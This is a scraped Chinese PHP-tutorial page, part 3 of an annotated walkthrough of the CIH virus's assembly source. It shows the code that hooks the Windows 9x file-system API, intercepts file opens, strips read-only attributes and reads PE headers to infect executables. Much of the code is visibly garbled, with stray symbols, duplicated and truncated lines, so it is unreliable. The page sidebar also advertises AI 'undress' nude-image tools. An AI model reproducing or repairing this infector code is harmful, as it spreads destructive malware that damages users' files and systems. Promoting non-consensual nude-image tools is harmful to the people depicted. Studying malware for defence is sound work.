病毒程式原始碼實例剖析-CIH病毒[3]-php教程-PHP中文網

首頁

後端開發

php教程

病毒程式原始碼實例剖析-CIH病毒[3]

黄舟

Jan 17, 2017 am 11:16 AM

jmp ExitRing0Init ;退出Ring0級
　　
　　;合併後的程式碼大小
　　CodeSizeOfMergeVirusCodeSection = offsetPEwidp.　　InstallFileSystemApiHook:
　　push ebx
　　
　　call @4
　　
　　call @4
　　指令的偏移位址
　　add ebx, FileSystemApiHook-@4 ;加上偏移量的差異等於FileSystemApiHook的偏移
　　
　　push 〠
　　
　　push 〠
　　IFSMgr_RemoveFileSystemApiHook = $
　　dd 00400068h ;使用eax、ecx、edx和flags暫存器
　　pop eax
　　
　　;呼叫原先的IFSMgr_InstallFileSystemApiHook功能連接SystemApiHook-@3[ebx]
　　
　　pop ecx
　　push eax
　　push ebx
　　
　　call OldInstallFileSystemApiHook-@3[ebx]
　　pop ecx
　　
　。mov pop eax
　　pop ebx
　　
　　ret
　　
　　OldInstallFileSystemApiHook ddpe
　　OldInstallFileSystemApiHook ddpe
　　OldInstallFileSystemApiHook ddm ; SystemHook呼叫入口
FileSystemApiHook:
　　@3 = FileSystemApiHook
　　
　　push ad ;儲存
　　pop esi ; mov esi, offset ;esi為當前指令的偏移
　　add esi, VirusGameDataStartAddress-@5 ;esi為FileSystemApiHook的偏移
　　;加上VirusGameDataStartAddress的偏移之差等於VirusGameDataStartAddress的偏移
　　
　　;測試「忙」標誌，「忙」則到pIF test
　　;測試「忙」標誌，「忙」則到pIFSF test$3,7][3]
　　jnz pIFSFunc
　　
　　;如果沒有開啟文件，則前往prevhook
　　lea ebx, [esp+20h+04h+04h　　lea ebx, [esp+20h+04h+04h]d.如下
　　;FileSystemApiHookFunction(pIFSFunc FSDFnAddr , int FunctionNum, int Drive,
　　;int ResourceFlags, int CodePage, pioreq pir)
　　
　　;判斷此次呼叫是否是為了打開文件，如果不是就跳到前一個文件鉤『
　　jne prevhook
　　
　　inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;設定「忙」標誌為「忙」
　『『 ;若磁碟機號碼為03h，則表示該磁碟機是C磁碟
　　mov esi, offset FileNameBuffer
　　add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer 🀜　　〜〜〜) h] ;ebx+ 4為磁碟號的位址
　　
　　;是否UNC(universal naming conventions)位址，若是就轉CallUniToBCSPath
　　cmp al, 0ffh
　　mov ah, ':'
　　
　　mov [esi] , eax ;處理成"X:"的形式，即在盤符後面增加一個冒號
　　
　　inc esi
　　inc esi
　　🀜　　。》＋為普通的字元集，把一般的SPath(unsigned char * pBCSPath, ParsedPath * pUniPath,
　　;unsigned int maxLength, int charSet)
　　CallUniToBCSPath:
　　push 00000000h;　　mov ebx, [ebx+10h]
　　mov eax, [ebx+0ch]
　　add eax, 04h
　　push eax ;Uni字元首址
　　push esi ;BCS字元首址
　　Uniint 20h; 00041h 呼叫id
　　add esp, 04h*04h
　　
　　;判斷檔案是否為EXE檔案
　　cmp [esi+eax-04h], 'EXE.'
　　pop esi
　　jne DisableOnBusy
　　cmp [esi+eax-06h], 'KCUF'
　　jne DisableOnBusy
　　
　　ENDIF
　　
　　;判斷文件是否存在，如果不存在，則轉向DisableOnBusy處
　　cmp『　
　　;取得檔案屬性
　　mov ax, 4300h
　　int 20h ;呼叫IFSMgr_Ring0_FileIO取得檔案屬性的功能
　　IFSMgr_Ring0_FileIO = $
　　dd 00400032h ;呼叫號碼
　　
jc DisableOnBusy
　　push ecx
　　
　　;取得IFSMgr_Ring0_FileIO位址
　　mov
　　
　　;判斷是否只讀文件，如果是，則修改文件屬性，否則轉向OpenFile處
　　test cl, 01h
　　jz OpenFile
　　
　　mov ax, 4301h 🀜.修改文件屬性的功能，使文件可寫
　　
　　;開啟文件
　　OpenFile:
　　xor eax , eax
　　mov ah, 0d5h
　　xor ecx, ecx ;檔案屬性
　　xor edx, edx 🎀〨　x ;esi為檔案名稱首址
　　call edi ;呼叫IFSMgr_Ring0_FileIO開啟檔案的功能
　　
xchg ebx, eax ;在ebx中保存文件句柄
　　
　　;是否需要恢復文件屬性(有寫屬性就不需要恢復了)
　　pop ecx 　jz IsOpenFileOK
　　
　　;恢復檔案屬性
mov ax, 4301h
　　call edi ;恢復檔案屬性
　　
　　;檔案開啟是否成功，如果不成功，則轉向DisableOnBusy處
　　IsOpenFiledOpenxOpenp.
　　
　　;檔案開啟成功
　　push esi ;把檔案名稱資料區首址入棧
　　
　　pushf ;CF = 0，保存標誌位
　　
　　add esi, DataBuffer-@7 ;esi『 , eax
　　mov ah, 0d6h ;IFSMgr_Ring0_FileIO的讀取文件功能號(R0_READFILE)
　　
　　;為了達到使病毒程式碼長度最少的目的，把eax保存到ebp
　Fv 『讀4個位元組
　　pop ecx
　　push 0000003ch ;讀取DOS檔案頭偏移3ch處的Windows檔案頭首偏移
　　pop edx
　　call edi ;讀取檔案到esi
　　🀜　　〜)　　;取得圖形檔案頭的PE標記和已感染標記
　　dec edx
　　mov eax, ebp ;功能號
　　call edi ;讀到esi 🀜　　〜　〜〜　是否為WinZip自解壓縮文件，如果是，就不感染Self-Extractor *
　　cmp dword ptr [esi], 00455000h ;判斷是否是PE檔案(標誌"PE/0/0")
　　jne CloseFile ;
　　
　　;如果是PE文件，且沒有被感染，就開始感染該文件
　　push ebx ;保存檔案句柄
　　push 00h『1 標記標記　〜1〜」
　　push edx ;edx指向PE檔案頭偏移00h
　　push edi ;edi為IFSMgr_Ring0_FileIO的位址
　　
　　mov dr1, esp ;儲存」　　
　　;讀取文件頭
　　mov eax, ebp
　　mov cl, SizeOfImageHeaderToRead ;要讀2個字元
push eax ;檔案指標
　　
　　lea eax, (NewAddressOfEntryPoint-@8)[esi]
　　push eax ; eax, word ptr (SizeOfOptionalHeader-@8)[esi]
　　lea edx, [eax+edx+12h] ;edx為病毒程式碼區塊表的偏移
　　
　　;項目的大小
　　
　　mov cl, (NumberOfSections-@8)[esi]
　　
　　mul cl ;每個區塊表　塊數等於表塊大小表塊大小　lea esi, (StartOfSectionTable -@8)[esi] ;esi指向區塊表首址(在病毒動態資料區中)

以上就是病毒程式原始碼實例剖析-CIH病毒[3]的內容，更多相關內容請關注PHP中文網（ www.php.cn）！

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

人工智慧驅動的應用程序，用於創建逼真的裸體照片

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

免費脫衣圖片

Clothoff.io

AI脫衣器

AI Hentai Generator

免費產生 AI 無盡。

熱工具

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

中文版，非常好用

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

熱門話題

gmail信箱登陸入口在哪裡

7494

CakePHP 教程

1377

steam的賬戶名稱是什麼格式

win11激活密鑰永久

NYT連接提示和答案

Related knowledge

php中的捲曲：如何在REST API中使用PHP捲曲擴展 Mar 14, 2025 am 11:42 AM

PHP客戶端URL（curl）擴展是開發人員的強大工具，可以與遠程服務器和REST API無縫交互。通過利用Libcurl（備受尊敬的多協議文件傳輸庫），PHP curl促進了有效的執行

支付寶PHP SDK轉賬報錯：如何解決'Cannot declare class SignData”問題？ Apr 01, 2025 am 07:21 AM

支付寶PHP...

解釋PHP中晚期靜態結合的概念。 Mar 21, 2025 pm 01:33 PM

文章討論了PHP 5.3中介紹的PHP中的晚期靜態結合（LSB），允許靜態方法的運行時間分辨率調用以更靈活的繼承。 LSB的實用應用和潛在的觸摸

在PHP API中說明JSON Web令牌（JWT）及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一種基於JSON的開放標準，用於在各方之間安全地傳輸信息，主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時，可以生成和驗證JWT，並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大，調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、